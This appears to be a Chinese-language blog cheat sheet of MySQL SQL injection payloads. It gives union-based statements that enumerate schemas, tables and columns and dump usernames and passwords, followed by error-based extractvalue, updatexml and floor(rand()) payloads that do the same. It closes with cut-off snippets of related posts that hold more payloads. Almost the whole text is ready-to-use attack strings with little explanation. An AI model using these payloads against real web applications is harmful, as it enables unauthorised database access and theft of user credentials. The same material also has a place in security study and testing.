mysql 報錯注入語句 mysql注入

2021-10-18 21:01:37 字數 2172 閱讀 8306

sql的注入型別有以下5種:

boolean-based blind sql injection(布林型注入)

error-based sql injection(報錯型注入)

union query sql injection(可聯合查詢注入)

stacked queries sql injection(可多語句查詢注入)

time-based blind sql injection(基於時間延遲注入)

user() 當前使用者名稱

database() 當前資料庫名

version() mysql 版本

@@basedir可以獲取mysql的安裝路徑

@@datadir用來獲取mysql的資料路徑。

聯合查詢

union select concat(『~『,user(),database(),version())from users 鏈結函式將內容在乙個顯錯位一起爆出來

union select group_concat(schema_name) from information_schema.schemata 爆全部的庫名

union select table_name from information_schema.tables where table_schema=0x7365637572697479 爆表名

union select group_concat(table_name)from information_schema.tables where table_schema=database() 爆表名

union select column_name from information_schema.columns where table_name=0x7573657273 爆列名

union select concat_ws(『~『,id,username,password) from users 爆內容

union select concat_ws(char(32,126,32),id,username,password) from users 爆內容

union select concat_ws(char(32,126,32),`id`,`username`,`password`) from users 爆內容

union select 1,group_concat(username,0x3a,password),3 from users 爆內容

報錯查詢

and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 爆全部表

或者and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ 爆全部表

and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273))) 爆全部列

and extractvalue(1,concat(0x7e,(select group_concat(id,username,password)from users ))) 爆全部內容

and 1=extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in (『dumb『,『i-kill-you『))))爆全部內容 用not in

mysql報錯主要分為三種方式

報錯型注入常用語句

and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=updatexml(1,concat(0x7e,(select database())),1)and 1=extractvalue(1,concat(0x7e,(select database())))

新型mysql報錯注入

新型mysql報錯注入,這種報錯注入主要是基於mysql中無符號int資料型別的溢位 1.查詢資料庫版本 select 2 if select 8 from select version s 18446744073709551610,18446744073709551610 select 1e308...

mysql報錯型注入

mysql bug 8652 group by 對一些rand 函式進行操作時會返回duplicate key 錯誤,而這個錯誤將會披露關鍵資訊 duplicate entry for key1 這裡的 正是使用者輸入的希望查詢的內容 而該bug產生的主要原因就是 在rand 和group by同時...

MYSQL注入語句

union select 1,1,1,1,1 order by 13 union select 1,2,3,4,11,12,13 from admin union select 1,version 3,13 from admin union select 1,username,3,13 from a...